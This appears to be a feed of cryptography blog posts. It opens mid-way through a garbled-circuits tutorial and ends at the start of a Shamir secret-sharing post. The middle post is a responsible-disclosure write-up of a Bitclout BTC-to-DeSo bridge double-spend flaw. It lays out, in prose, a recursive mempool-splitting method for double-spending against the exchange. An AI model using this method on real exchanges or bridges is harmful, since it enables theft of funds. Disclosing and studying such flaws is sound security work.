Wire 6 |
---|
$E_{K_1^0}(E_{K_2^0}(K_6^0 || K_6^0)$ |
$E_{K_1^0}(E_{K_2^1}(K_6^0 || K_6^0)$ |
$E_{K_1^1}(E_{K_2^0}(K_6^0 || K_6^0)$ |
$E_{K_1^1}(E_{K_2^1}(K_6^1 || K_6^1)$ |
We denote with $x|y$ the concatenation of strings $x,y$. We also denote with $E_K(p)$ the encryption of $p$ with key $K$.
So each output is the double encryption (using the key of the first input wire and then the second input wire) of the concatenation of the output with itself. We’ll explain shortly why we concatenate the output with itself, but for now take it as given.
And $\mathcal{P}_2$ views this table as:
Wire 6 |
---|
$E_{K_1^?}(E_{K_2^?}(K_6^? || K_6^?)$ |
$E_{K_1^?}(E_{K_2^1}(K_6^? || K_6^?)$ |
$E_{K_1^¿}(E_{K_2^?}(K_6^? || K_6^?)$ |
$E_{K_1^¿}(E_{K_2^¿}(K_6^¿ || K_6^¿)$ |
So this time, just like previous attempt $\mathcal{P}_A$ will send:
Now, for our XOR gate (with input wires 1 and 2) $\mathcal{P}_B$ will take $K_1^?$ (just like we did before, we use “?” to imply that $\mathcal{P}_B$ doesn’t know whether its the garbling of the value “1” or “0”) and its own garbled input (let’s assume its $K_2^0$ without loss of generality). Next, it will try to double-decrypt all the entries in the garbled table with the input encryption keys until the decryption successfully results in some value written twice (with $K_6^? || K_6^?$ or $K_6^¿ || K_6^¿$), in this case it knows that the resulting output is correct. So, we write the output value twice as a way to verify that a decryption is successful so $\mathcal{P}_B$ can tell that the output is correct. There are other ways of doing the kind of verification that the decryption is done correctly, see Authenticated Encryption for further detail.
For example, if $\mathcal{P}_A$’s garbled input is $K_1^1$ and $\mathcal{P}_B$’s garbled input is $K_2^0$ then $\mathcal{P}_B$ will try to decrypt each entry in the garbled table as follows:
The only issue we have arises from the fact that $\mathcal{P}_B$ receives the garblings of both of its possible inputs for each wire that its input feeds, so it can enumerate all possible combinations of its inputs and evaluate the circuit for each such combination. We know that for all input combinations, except for one, the output will be the same (the value of $K_7^0$) and only for one of the combinations the output will be unique ($K_7^1$), this is because only for one possible input of $\mathcal{P}_B$, which is the negation of the input of $\mathcal{P}_A$, the circuit will output the value of 1. By taking the input that was fed into the circuit to yield the unique value of $K_7^1$, ungarbling it and flipping the bits $\mathcal{P}_B$ can reveal the whole input of $\mathcal{P}_A$, which violates our privacy requirements.
We understand that $\mathcal{P}_B$ can’t receive both keys for each wire that it feeds its input, because then it will be able to learn \mathcal{P}_A’s input. However, without those keys - it must disclose its input to $\mathcal{P}_A$! How can we solve it? While it may seem like a dead end - luckily cryptographers have come up with a great solution, known as “Oblivious Transfer”.
The problem oblivious transfer (OT) is trying to solve is the following:
There are two parties $\mathcal{P}_A$ and $\mathcal{P}_B$. Party $\mathcal{P}_A$ is holding two values $x_1,x_2$. Party $\mathcal{P}_B$ is holding a bit $b$. The parties want $\mathcal{P}_B$ to learn $x_b$ without $\mathcal{P}_A$ learning the value of $b$ (i.e. which $x_b$ was transferred to $\mathcal{P}_A$).
While it isn’t very complex, we will show go through the construction of Oblivious-Transfer in this post(please let me know if you find this topic interesting, I may create another post about it later). This post is complex enough :)
This attempt will be exactly like the second attempt, but we will leverage OT to solve our last problem. The only difference from previous attempt will be that now $\mathcal{P}_B$ will learn only one of either $K_2^0$ or $K_2^1$ and either $K_4^0$ or $K_4^1$, according to what $\mathcal{P}_B$’s input is. This will be done using Oblivious-Transfer. This prevents the attack suggested in the previous attempt since now $\mathcal{P}_B$ will hold only one of $K_2^0$ and $K_2^1$ and only one of $K_4^0$ and $K_4^1$.
Just to recap over our amazing result, this subsection will give the full details of our garbled circuits.
There are two parties $\mathcal{P}_A$ and $\mathcal{P}_B$ with bit-vector inputs ${\bf A} = (A_1,…,A_n)$ and ${\bf B}=(B_1,…,B_n)$ respectively. A function $f$ represented as a boolean-circuit, known to both parties with wires $w_1,w_2,…,w_k$ where $k$ is the total number of wires in the circuit. Wires $w_1,…,w_n$ will be the $n$ wires in the circuit that take the input of $\mathcal{P}_A$.
The next $n$ wires, $w_{n+1},…,w_{2n}$, will take the input of $\mathcal{P}_B$. The rest of the wires take the output of one of the gates in the circuit. The goal of both parties is to evaluate $f$ together without disclosing any information about their inputs.
The evaluation works in three phases:
Party $\mathcal{P}_A$ will garble the circuit and its input. Each wire $w_j$ in the circuit will be assigned with two encryption keys $K_j^0$ and $K_j^1$ which will represent the garbling of the values of and 1 going through the wire, respectively. Next, for each gate $G$ in the circuit with two input wires $w_a, w_b$ and one output wire $w_c$ with the following truth table:
$w_a$ | $w_b$ | $w_c$ |
---|---|---|
0 | 0 | $g_{0,0}$ |
0 | 1 | $g_{0,1}$ |
1 | 0 | $g_{1,0}$ |
1 | 1 | $g_{1,1}$ |
Such that $g_{i,j}$ is the output of the gate $G$ with inputs $w_a=i$ and $w_b=j$. Then the garbling of gate $G$ with the truth table above is:
$w_c$ |
---|
$E_{K_a^0}(E_{K_b^0}(K_c^{g_{0,0}} || K_c^{g_{0,0}}))$ |
$E_{K_a^0}(E_{K_b^1}(K_c^{g_{0,1}} || K_c^{g_{0,1}}))$ |
$E_{K_a^1}(E_{K_b^0}(K_c^{g_{1,0}} || K_c^{g_{1,0}}))$ |
$E_{K_a^1}(E_{K_b^1}(K_c^{g_{1,1}} || K_c^{g_{1,1}}))$ |
Each garbled gate will be sent to $\mathcal{P}_B$. The input of $\mathcal{P}_A$, which is ${\bf A} = (A_1,…,A_n)$ will be garbled into $(K_1^{A_1},…,K_n^{A_n})$. The garbled input vector will also be sent to $\mathcal{P}_B$.
After receiving the garbled circuit and the garbled input of $\mathcal{P}_A$, the parties will run $n$ iterations of the OT protocol so $\mathcal{P}_B$ will learn its garbled input $K_{n+1}^{B_1},…,K_{2n}^{B_n}$.
At this point $\mathcal{P}_B$ will evaluate the circuit by sequentially evaluating each gate in the circuit, starting from gate that depends only on the inputs of the parties up until evaluating the gate which yield the output of the function. For each gate with input wires $w_a, w_b$ and output wire $w_c$ we assume that the garbled value of both input wires are already known, either because these are the input wires or because they are wires who come out of a gate which was already evaluated. The value of each wire $w_a$ is one of the encryption keys associated with the wire, either $K_a^0$ or $K_a^1$.
Since the circuit is garbled $\mathcal{P}_B$ doesn’t know which value of those is he holding so we denote the values he holds in his perspective as $K_a^?$ and $K_b^?$. Then, party $\mathcal{P}_B$ will decrypt, using the keys from the input wires, all entries in the table until the decryption yields some string which is repeated twice $K_c^? || K_c^?$. When it does, $\mathcal{P}_B$ can tell that the decryption succeeded and the garbled output of the gate is the $K_c^?$ retrieved from the decryption. When the decryption succeeds $\mathcal{P}_B$ sets the value of $w_c$ to be $K_c^?$ and moves on to evaluate ther next gate. When it finishes evaluating all gates in the circuit it will send the garbled value of the output wires to party $\mathcal{P}_A$.
Party $\mathcal{P}_A$ receives the garbled output of each wire. Using the keys it generated for each wire it can tell whether each value is the garbling of 1 or 0 and thus construct the (ungarbled) output and share it with $\mathcal{P}_B$.
In the article we’ve discussed what garbled circuits are, their usage and purpose and how they can be constructed. The academic community has put a lot of effort into understanding and optimizing garbled circuits and many optimizations exist which greatly reduce the communication complexity of the parties as well allow ensuring certain security properties. In particular some security and integrity properties of the process aren’t guaranteed with our existing construction:
Moreover, we haven’t discussed the construction of OT which solved one of the core issues in our construction. Maybe I’ll discuss those in a future post.
See you next time!
]]>In this post, I will describe a vulnerability and its exploitation in the Bitcoin to DeSo bridge within the Bitclout backend service that I’ve found. If you don’t know what Bitclout is, we will get there shortly.
The vulnerability itself is based on a double-spending attack in the Bitcoin network by having some miners holding one set of transactions in their mempool while others holding another set of transactions such that both sets are contradictory.
If you find interest in the internals of Bitcoin, this article reaches great depths of how Bitcoin works and what makes it secure and gives a glimpse on what makes the solving of double-spending in Bitcoin so important. I will be assuming some familiarity with Bitcoin and how it works along the article.
I named this vulnerability “Griphook”, the character from the Harry Potter world who helped Harry, Ron and Hermoine to break into Gringotts Bank. If you want to know the connection, continue reading :) !
The article is structured as follows:
First I’ll give some background information about Bitclout and the process of buying Bitclout coins from Bitcoin using Bitclout’s backend’s exchange service.
Next I’ll explain the key issues with the existing mechanism, followed by a pseudo-code styled exploitation outline.
To conclude, I’ll try to give a general sense of what can be done to resolve similar issues in the future and what was done concretely in the case of Bitclout’s service.
Q: I’m a Bitclout user, are / were my coins at risk? Should I sell my coins? Is Bitclout insecure? Is DeSo insecure?
A: The bug only affects Bitclout’s vault and none of the coins / wallets of any user were at risk at any point in time. The security and robustness of the DeSo blockchain was neither at risk.
DeSo (abbreviation of Decentralized Social) is a decentralized blockchain-based social network giving the users a whole new ecosystem by introducing sophisticated usage of creator coins.
The native DeSo coin, denoted as $DeSo
, is used to purchase such creator coins.
We will get rid of the ‘$’ sign and simply use DeSo to denote both the blockchain and the coin itself where the meaning should be implied from the context.
The original and the most popular gateway into the realms of DeSo is known as Bitclout, and it is a website through which users can use the decentralized social network of DeSo.
The DeSo coin itself can be traded on various crypto exchanges and can be natively exchanged within the Bitclout website from Bitcoin.
To get a better sense of what Bitclout is, the options it gives its users and the philosophy at the basis of its design follow the Intro to Bitclout Page.
Notice that distinguishing between Bitclout and DeSo is a relatively new concept so some of the documents may still be referring to Bitclout while the correct term should be DeSo. This research was conducted before the introduction of DeSo, but this doesn’t affect the final results of the research.
In the rest of this section we will focus on the proceedings involved in buying DeSo using the BTC-DeSo exchange within the Bitclout website.
Much like various Bitcoin wallets, every user signing up to Bitclout gets a seed of 12 words from which it can derive various keys used to sign transactions in Bitclout.
After signing up, buying DeSo using BTC can be done from within the Bitclout website using this page looking something like this:
Figure 1: Bitclout Despoit Page
In particular, this can be done with the following steps:
After waiting for a few seconds, the swap is confirmed and your Bitclout address will be rewarded with the appropriate amount of DeSo.
This was the moment when I was alarmed and started wondering, “how come my Bitclout account is immediately credited with CLT while the Bitcoin transaction hasn’t been confirmed yet?”.
Bitclout’s backend Github repo is a good source to get a better technical sense on what is happening under the hood when buying DeSo with BTC.
The function handling the exchange of Bitcoin to Bitclout can be found here.
The function (as its name suggests) is stateless, in a sense that it doesn’t hold any state information between consecutive calls. In each call it receives from the client all the necessary pieces of information to generate a Bitcoin transaction from the deposit address, controlled by the client, to Bitclout’s Bitcoin deposit address.
One of the parameters, named $\mathtt{broadcast}$, can be used to determine whether to broadcast the generated transaction to the Bitcoin network or not.
This parameter is necessary because in order to make the exchange, the client will make two calls to the exchange API.
The first will not be broadcast to the network and will only be used to generate a TX which will be sent back to the client and signed by him.
The second call will contain the signature generated by the client for the TX. Using this signature the Bitclout backend is able to broadcast the transaction to the Bitcoin network.
In summary, the communication pattern between Bitclout and the client, in the process of exchanging Bitcoin to DeSo constitutes the following messages:
In step 4, as mentioned, the backend is making some verifications regarding the resulting transaction such as:
After doing so it waits for five seconds and then queries the BlockCypher TX-API whether the transaction is a double spend or not.
If this isn’t a double spend transaction the Bitclout address is credited with the appropriate amount of DeSo coins by transferring the coins from Gringotts account using a standard transaction over DeSo network.
In this section I’ll try to describe a simplified version of the attack. This version doesn’t work and never worked but it is important to understand it before diving into the attack that did work eventually.
So, the first and most basic attack one could come up with, according to the aforementioned procedure, is to create a double spending attack as we describe in this subsection.
We denote by $\mathtt{A}$ a UTXO encumbered to some address $\mathtt{Addr}_{\mathtt{A}}$ owned by the attacker, which creates the following two TXs:
Notice that since exchange-TX and self-TX are contradictory in the sense that they both spend UTXO $\mathtt{A}$,only one of them will eventually be confirmed. The idea is that if the DeSo purchasing, done with exchange-TX is successful but eventually the self-TX gets confirmed on Bitcoin, then we managed to buy DeSo without paying the BTC for it, thereby successfully attacking Bitclout’s service.
The self-TX and exchange-TX transactions should be transmitted to the network such that the following assertions hold:
What we try to achieve here is that while Bitclout’s backend will credit the attacker’s account with DeSo coins, the Bitcoin-TX from the attacker to BitClout’s account will not be confirmed using double spending.
However, the three restrictions make it difficult to exploit because in order to satisfy the first two assertions we want to send self-TX much later than exchange-TX, but in order to satisfy the third assertion we will be interested in sending self-TX earlier than exchange-TX making the possibility of successfully timing the attack questionable. Thus, this variant of the exploitation, while seems simple, may require some collusion from the miners to mine, and accept into the mempool, the self-TX despite it reaching them after the exchange-TX.
Bitclout’s backend uses BlockCypher’s API to check whether a transaction is a double spending. The API is used by sending an HTTP GET request to https://api.blockcypher.com/v1/btc/main/txs/.
For example, by initiating a GET to:
https://api.blockcypher.com/v1/btc/main/txs/38c404ebeb86b72a616636cc38e579ad6478ddbca4fe63c83004cb851a2a391e
We get the following response with the double_spend
field in bold:
{
"block_height": -1,
"block_index": -1,
"hash": "38c404ebeb86b72a616636cc38e579ad6478ddbca4fe63c83004cb851a2a391e",
"addresses": [
"1GtZ85mQ36ZbXEPUvS8Nx9Y3HekWW3dZMi"
],
"total": 200661,
"fees": 200,
"size": 191,
"vsize": 191,
"preference": "low",
"relayed_by": "3.89.107.32",
"received": "2021-08-25T12:11:55.248Z",
"ver": 2,
"double_spend": false,
"vin_sz": 1,
"vout_sz": 1,
"confirmations": 0,
"inputs": [
{
"prev_hash": "cc22f4f0824ba1e70d6f95e17e6184dab149796c6eaa6e7c332619f8fc99bc3d",
"output_index": 0,
"script": "473044022078a8a38f4b307a49892d5f35d86bda65063b6807dd7f8491c28070d50f1ea13a02203f7a74e3001fad59204a620dabe772ea1636465222fd44f8a66d21ed71515759012102f86e9dd205e0e47b8268df43c0084cd7621b4abe5817d26e97d1d4027b002959",
"output_value": 200861,
"sequence": 4294967295,
"addresses": [
"1GtZ85mQ36ZbXEPUvS8Nx9Y3HekWW3dZMi"
],
"script_type": "pay-to-pubkey-hash",
"age": 0
}
],
"outputs": [
{
"value": 200661,
"script": "76a914ae49ea3ce84872d517ef958a7c4b225f4904020788ac",
"addresses": [
"1GtZ85mQ36ZbXEPUvS8Nx9Y3HekWW3dZMi"
],
"script_type": "pay-to-pubkey-hash"
}
]
}
Given the output of this format, Bitclout takes the double_spend
key and checks whether it is true
or false
.
To make the exploitation of BTC-DeSo exchange much simpler we introduce a bug in the way Bitclout makes use of BlockCypher’s API which occurs in a uniquely and specially crafted generated situation.
The issue stems from Bitclout misinterpretation of how BlockCypher determines whether a transaction is a double spend, and more precisely, whether the property of being a double-spend transaction is transitive or not. Let’s look at an example.
Assume the following tree of UTXOs/transaction:
Figure 2. A small set of transactions causing the bug
We begin with UTXO A
and double spend it to create two UTXOs denoted by B1
and B2
.
To make things clear when we say double spend it means that in the network of Bitcoin there exists different nodes that hold either B1
or B2
in their mempool, as a side note we mention again that in bitcoin-core by default a node will reject double spending so typically either B1
or B2
will reside in a node’s mempool, but theoretically a custom node could hold them both.
At this point if we query BlockCypher’s API regarding B1
and B2
it will report both transactions as a double spend, because both of them are spending UTXO A
.
However, and here is the tricky part, if we spend UTXO B1
to create a new UTXO C
, then querying BlockCypher will report C
as a non-double-spend transaction.
To make things clear, the implied definition of BlockCypher to a double-spend transaction from the responses of their API is:
Double spend: A transaction will be considered as a double-spend if at least one of its inputs is an input of another transaction that has been in the mempool.
However, the implied definition Bitclout assumes for double spending is:
Double spend: A transaction will be considered as a double-spend if at least one of its inputs is either an output of a double-spend transaction or an input of another transaction that has been in the mempool.
In other words, Bitclout implicitly assumes that the definition of double-spend is transitive, while on BlockCypher this isn’t the case.
In this section we’ll give an exploit to the bug from the previous section. This exploit isn’t optimal and doesn’t really work. It is important to understand it in order to understand the fully optimized exploit that follows it. Consider the following diagram from the previous subsection illustrating a tree of UTXOs:
Figure 3. A small set of transactions causing the bug
Note: For simplicity, we will refer to $\mathtt{A}$, $\mathtt{B_1}$, $\mathtt{B_2}$ and $\mathtt{C}$ sometimes as UTXOs and sometimes as the transactions whose output is the corresponding UTXO.
In our exploitation we begin with a UTXO $\mathtt{A}$ owned by the attacker.
The attacker will send two transactions creating two UTXOs, both spending UTXO $\mathtt{A}$.
Now the attacker will initiate a BTC-DeSo exchange against Bitclout. As we mentioned earlier, when initiating an exchange in the BTC-DeSo bridge, the client reports which UTXOs it wishes to spend. Thus, the attacker will be reporting only UTXO $\mathtt{B_1}$ as available, so the Bitclout backend will try to spend UTXO $\mathtt{B_1}$ by creating a new transaction $\mathtt{C}$ with minimal fees (as fees are controlled by the attacker) to the address of Bitclout’s Bitcoin address.
Upon making the appropriate verifications, the transaction will obviously not be considered an RBF, passing Blockonomics’ verification.
When Bitclout’s backend will be sending the created UTXO $\mathtt{C}$ to BlockCypher this transaction will obviously not be considered a double spend since this is the only transaction spending UTXO $\mathtt{B_1}$.
At this point the attacker’s Bitclout address will be credited with an appropriate amount of DeSo.
However, since UTXO $\mathtt{B_2}$ has much more fees attached, a miner will much more likely prefer it over UTXO $\mathtt{B_1}$ and $\mathtt{C}$ thus cancelling the payment to Bitclout’s address, completing the attack successfully.
Now this attack sounds quite simple, and it is, this is why it doesn’t really work in practice.
At this point I have had come up with multiple hypotheses which all stem from the following basic rule:
You see, the Bitcoin network is composed of nodes, interconnected in mysterious and unknown ways to each other. In our attack we have created two UTXOs:
We have sent $\mathtt{B_1}$ via a node owned by BlockCypher, thus we can assume this node is connected to multiple other large nodes and big-shots in the crypto industry. Therefore, the message sent from BlockCypher’s node will probably quickly propagate to Blockonomics’ node, which is good, because we need Blockonomics’ node to know this TX to pass the RBF test, but it will also quickly propagate to other nodes, some owned by the great mining pools for example.
On the contrary, we have sent $\mathtt{B_2}$ via our local Bitcoin node, connected to a small set of random nodes on the Bitcoin network and thus may endure longer propagation delays to reach some nodes such as Blockonomics’ node and miners’ nodes.
In the following section we’ll get a better sense of what propagation delays are and how to use them as part of the exploit.
Consider the following figure:
Figure 4. A set of nodes and their messages’ propagation delays
This figure gives a general illustration of the Bitcoin network, with several nodes in it.
The large circle resembles the Bitcoin network. Inside, we have two main “nodes”, denoted with pink rectangles.
Surrounding each of these nodes is a circle, delineating the portion of the network reachable from each node within a 2 milliseconds delay. In other words, each circle marks the portion of the network that will receive a Bitcoin message sent from each node with at most 2 milliseconds delay. Since each node is connected to a different set of nodes, the circles cover different parts of the network, both in placement and in size.
Therefore, consider our original scenario where we send two different transactions, both spending the same UTXO, one is sent from our local Bitcoin node and the other is sent from BlockCypher’s Bitcoin node. We would like to know for four different nodes in the network, positioned in points labelled A, B, C and D, which Bitcoin transaction did they accept into their mempool after 2 milliseconds from the moment these two transactions were broadcast into the network.
It is important to mention that node C will accept only one of the transactions into its mempool to prevent DoS attacks on Bitcoin nodes. This is the default behavior in the Bitcoin-core project, and some nodes may behave differently. Due to this fact, we want to transmit the two transactions to the network in a way that will promise the following three properties:
Ideally, we would prefer sending TX $\mathtt{B_1}$ directly from Blockonomics’ node or connect directly to their node so this TX will reach Blockonomics’ node WHP (with high probability) before TX $\mathtt{B_2}$ while reaching as few other nodes on the Bitcoin network along the way, this way TX $\mathtt{B_2}$ will reach more nodes and will be confirmed WHP.
In other words, we want to create a setting in the mempools of the nodes in the Bitcoin network that a large portion of the nodes disagree with Blockonomics’ node. To be precise a node disagrees with another node if each has a different TX spending the same UTXO. For example, in the previous case where we have concurrently sent TXs $\mathtt{B_1}$ and $\mathtt{B_2}$, all nodes who have accepted $\mathtt{B_1}$ to their mempool disagree with all nodes who have accepted $\mathtt{B2}$ to their mempool.
The problem is that we don’t know the structure of the network and we don’t even know which node is Blockonomics’ node. If we did know, we could have simply sent Blockonomics’ node TX $\mathtt{B_1}$ and relentlessly broadcast to any other node on the network TX $\mathtt{B_2}$ so that TX $\mathtt{B_1}$ would reach only a small number of nodes.
To overcome this issue we can use a different approach. Instead of bisecting the set of nodes in the network into two sets who disagree with each other in one shot, we will iteratively get more and more nodes to disagree with Blockonomics. This will be done without knowing which node is owned by Blockonomics. We will be assuming:
Consider a set of nodes $\mathcal{N}$, for simplicity we assume $\left|\mathcal{N}\right| = 2^k$. We can split $\mathcal{N}$ into two sets $\mathcal{H_1}$ and $\mathcal{H_2}$, each of size $2^{k-1}$.
Assume we have a UTXO $\mathtt{A}$. We want to create two transactions $\mathtt{B_1}$ and $\mathtt{B_2}$ such that $\mathtt{B_1}$ will enter the mempool of all nodes in $\mathcal{H_1}$ and $\mathtt{B_2}$ to enter the mempool of all nodes in $\mathcal{H_2}$. We can do this by broadcasting $\mathtt{B_1}$ to all nodes in $\mathcal{H_1}$ and $\mathtt{B_2}$ to all nodes in $\mathcal{H_2}$.
To estimate the effectiveness of this process we make a major assumption on the structure of the Bitcoin network and the sampled set of nodes. We call it “the structural assumption”:
We assume that by sending two conflicting TXs ($\mathtt{B_1}$ and $\mathtt{B_2}$) to two set of equally sized nodes on the Bitcoin network ($\mathcal{H_1}$ and $\mathcal{H_2}$) who were randomly sampled using Bitnodes API, approximately $50\%$ of all nodes will eventually hold $\mathtt{B_1}$ and $50\%$ will hold $\mathtt{B_2}$ in their mempool.
After broadcasting $\mathtt{B_1}$ to the nodes in $\mathcal{H_1}$ and $\mathtt{B_2}$ to the nodes in $\mathcal{H_2}$ we certainly know that one of them got into Blockonomics and one didn’t. Therefore, we can query Blockonomics’ API about whether it holds $\mathtt{B_1}$ or $\mathtt{B_2}$ in its mempool.
Let’s assume WLOG (without loss of generality) that $\mathtt{B_1}$ was accepted into Blockonomics’ node’s mempool. Therefore, all nodes in $\mathcal{H_2}$ disagree with Blockonomics and by our “structual assumption” we know that roughly $50\%$ of the network disagree with Blockonomics.
The first thing we will do at this point is to incentivize all nodes that accepted $\mathtt{B_2}$ into their mempool to mine $\mathtt{B_2}$. This can be done by sending a new TX $\mathtt{B_3}$ with very high fees that spend the output of $\mathtt{B_2}$. Since the miners want the fees from TX $\mathtt{B_3}$ they will also have to mine $\mathtt{B_2}$ on which $\mathtt{B_3}$ relies.
After doing this we are situated at a familiar state and we would like to apply this algorithm recursively, let’s see how this can be done. We have a TX that we want to double spend (originally: $\mathtt{A}$, now: $\mathtt{B_1}$) and a set of nodes who hold this TX in their mempool (originally: $\mathcal{N}$, now: $\mathcal{H_1}$). Now we can run the algorithm by splitting $\mathcal{H_1}$ into two, equally-sized, sets of nodes and sending to each half set a different TX (either $\mathtt{C_1}$ or $\mathtt{C_2}$) spending the output of $\mathtt{B_1}$ getting a TX tree like this:
Figure 5. First recursive amplification step
Now we check whether $\mathtt{C_1}$ or $\mathtt{C_2}$ is accepted into Blocknomics. Let’s assume WLOG it is $\mathtt{C_1}$. So we create a TX $\mathtt{C_3}$ with very high fees to incentivize the network to prefer mining $\mathtt{C_2}$ rather than $\mathtt{C_1}$, getting a tree like this:
Figure 6. Second recursive amplification step
Now to make sure you’ve been following the recursion. Try drawing the TX-tree after the next recursion step yourself, after trying to scroll further to make sure you’ve got it right.
The tree would look like:
Figure 7. Third recursive amplification step
Notice that after each recursive step the number of nodes in the Bitcoin network who agree with Blockonomics is cut by half. Since we started with $|\mathcal{N}| = 2^k$ nodes, after $k$ recursive steps only a single node in our set will agree with Blockonomics’ mempool on average.
For example, in the last diagram, for the attack to fail wee need that $1/8$ of the nodes who still agree with Blockonomics will mine $\mathtt{D_1}$ (for minimal fees) before $7/8$ who disagree with Blockonomics will mine either $\mathtt{D_3},\mathtt{C_3}$ or $\mathtt{B_3}$ (for very high fees). We can tell from the greedy nature of the miners that this scenario is unlikely to succeed after going all the way down the recursion, thus giving our attack a very high probability to succeed.
Using this algorithm I have managed to successfully attack and steal (with permission from DeSo’s team, of course) a small amount of coins from Gringotts Bank!
The solution suggested to DeSo team is to verify on Bitclout’s backend, that when making a purchase using Bitcoin, that all inputs of the purchase are either confirmed or not double a spending outputs. This will be done using BlockCypher’s API. For those inputs who aren’t confirmed or confirmed with less than 6 confirmations, check their inputs recursively for the same properties, until all paths from all inputs end in confirmed TXs with sufficient number of confirmations.
For example, consider the following graph of TXs:
Figure 8. A set of transactions to be verified. Green transactions are non-double-spent with 6+ confirmations
Each node in the graph is a TX and an arrow from TX $\mathtt{X}$ to TX $\mathtt{Y}$ means that one of the inputs of TX $\mathtt{Y}$ is an output from TX $\mathtt{X}$.
Green nodes are confirmed TXs with 6+ confirmations.
Notice that a TX may have many outputs and that the graph isn’t necessarily a tree. For example, TXs $\mathtt{D2}$ and $\mathtt{D1}$ have multiple outputs that were used as inputs in TXs $\mathtt{C1}$ and $\mathtt{C2}$.
Now, let’s assume that a user holding the outputs of TX $\mathtt{A}$ is trying to make a purchase using the TXs output. The Bitclout’s backend shall take $\mathtt{A}$ and check whether it is confirmed with at least 6 confirmations. If so, then the verification ends successfully. Otherwise, the backend shall, recursively, take $\mathtt{A}$‘s inputs, namely $\mathtt{B1}$ and $\mathtt{B2}$ and check whether those are confirmed or not.
Since $\mathtt{B1}$ is confirmed with 6+ confirmations, we shall not continue checking its inputs.
However, this isn’t the case for $\mathtt{B2}$. So we first check that it isn’t a double spending and then take its inputs $\mathtt{C1}, \mathtt{C2}$ and check whether they are confirmed with 6+ confirmations. Since they aren’t either, we check they aren’t double spent and if they aren’t we move to their inputs, $\mathtt{D1}, \mathtt{D2}$ and check whether those aren’t a double spending transactions.
Reminder: We say that a transaction is a double spend if one of its inputs was used as an input to another transaction in some other nodes’ mempools.
This suggestion was implemented (with some other edge cases) in a recently pushed commit into Bitclout’s core library.
By finding a minor vulnerability in Bitclout’s backend an attacker could steal very large amounts of money from the DeSo vaults using the BTC-DeSo bridge, with Bitclout coin price reaching a price 150$ as of 1st, Oct. 2021. DeSo’s BTC wallet address (3MxwZUJGpLYRhtMKXgCUi3x68uosEGhyGw) has received hundreds of Bitcoins only in the past three months. Their previous address which was active until July (1PuXkbwqqwzEYo9SPGyAihAge3e9Lc71b) and received thousands of Bitcoins. Thus, the potential financial damage from such an attack could have had devastating implications on the future of the project of Bitclout.
I want to thank DeSo’s team for making the reporting and the bounty award process smooth and simple and for taking the time and effort to deeply understand my commentary and suggestions.
]]>Multi-Party Computation (MPC) heaivly relies on the primitive of Shamir’s secret sharing (SSS) for various use cases. In this secret-sharing scheme a set of $n$ parties would like to hold a secret in a distributed manner. The secret, which will be denoted $s$ for the rest of this post, is an element of a field $\mathbb{Z}_p$. It is important to mention that “distributed manner” means that party each party $P_i$ will hold a piece of information $p_i$ such that pieces of information can be later used to reconstruct the original share $s$. Typically secret-sharing schemes are associated with a threshold through which the security of the scheme is defined. A secret-sharing scheme with security threshold $t$ should satisfy the following security guarantees:
The parameters $t$ and $n$ are known prior to the sharing of the secret. With all that being said, it is still unclear how is such a scheme being bootsrapped? How are the shares $p_i$ being created and sent to each party $P_i$? To simply things we assume for now that there is a trusted-dealer who sends to each party $i$ its corresponding $p_i$. Later we will see how we can get rid of this trusted dealer. So what is this $p_i$, and how does it look like?
DISCLAIMER: I may not be 100% algebraically accurate for the sake of both brevity clarity.
REMINDER: A polynomial $P(x)$ is a function which can be expressed algebraically in the following form: $P(x) = \sum_{i=0}^k a_ix^i$ for some number $k$. The $a_i$ are called “coefficients” and the largest number $i$ such that $a_i \neq 0$ is the “degree” of the polynomial. Note that in the case that all coefficients are zero, we consider the degree to be $\infty$.
Shamir’s secret sharing utlizes one key algebraic property about polynomials known as the “unique interpolation theorem” which states that:
Given a set $S={(x_0,y_0),…,(x_t,y_t)}$ of $t+1$ pairs of field elements, such that at least one $y_i \neq 0$, there exists a unique polynomial $P_S(x)$ of degree at most $t$ such that $P_S(x_i)=y_i$ for all $0\leq i\leq t$.
Therefore, given two distinct polynomials $P_1(x), P_2(x)$ of degree at most $t$ and a set of $t+1$ sample points $x_0,…,x_t$ then for at least one $i$ between $0$ and $t$ it must hold that $P_1(x_i) \neq P_2(x_i)$. Thus, a set of $t+1$ evaluations of a polynomial is all that is required to reconstruct a polynomial $P(x)$. By “reconstructing” we mean deriving the coefficients $a_i$ of the polynomial so we will be able to express the polynomial in the form $P(x)=\sum_{i=0}^ta_ix^i$. This process of reconstructing a polynomial from a set of its evaluations is also known as interpolation.
Before diving into how the sharing is done, let’s answer an even more fundamental question. Given these $t+1$ evaluations of a polynomial at points $x_0,…,x_{t}$, how can the interpolation polynomial be constructed? The reconstruction’s smallest building blocks will be a set of degree $t+1$ polynomials $\pi_i^t(x)$ that satisfy for $x \in \{ x_0,…,x_{t} \}$ the following $t+1$ constraints:
\[\pi_i^t(x) = \begin{cases} 1 &\quad x=x_i\\ 0 &\quad x\neq x_i\\ \end{cases}\]Notice that for $x$ values which are not one of $x_1,…,x_{t+1}$ the value of $\pi_i^t(x)$ is not necessarily 0 or 1 and that there is exactly one polynomial who satisfies these constraints for every choice of $i$ and $t$ (according to the unique-interpolation theorem). Thus, the polynomial $\pi_i^t(x)$ can be constructed with the following formula:
\[\pi_i^t(x) = \prod_{j=1\\j\neq i}^{t}\frac{x - x_j}{x_i-x_j}\]This formula satisfies all our constraints:
The actual coefficients of $\pi_i^t(x)$ can be derived from this formula by programmatically multiplying the factors of the product.
Two observations that will allow us to reconstruct any polynomial of degree $\leq t$ from its samples on points $x_1,…,x_{t+1}$ are as follows:
- Let $P(x)=\sum_{i=0}^{t}p_ix^i,Q(x)=\sum_{i=0}^{t}q_ix^i$ be two distinct polynomials of degree $\leq t$, then their sum is also a polynomial of degree $\leq t$.
This one is correct because their sum can be expressed as a polynomial where coefficients are simply added: \(P(x)+Q(x)=\sum_{i=0}^{t}(p_i+q_i)x^i\)
- Let $P(x)=\sum_{i=0}^tp_ix^i$ be a polynomial and let $a \neq 0$ be a constant. Then the product $a\cdot P(x)$ is also a polynomial of degree $\leq t$.
Similarly to the previous one, this observation is correct because the resulting polynomial is the same as the original polynomial with all coefficients just multiplied by $a$.
Great, now using these observations we can create a polynomial $P(x)$ such that $P(x_i)=y_i$ for all $0 \leq i \leq t$. First let’s show the construction of the polynomial and and then explain why it satisfis the required properties. So, the polynomial is the following:
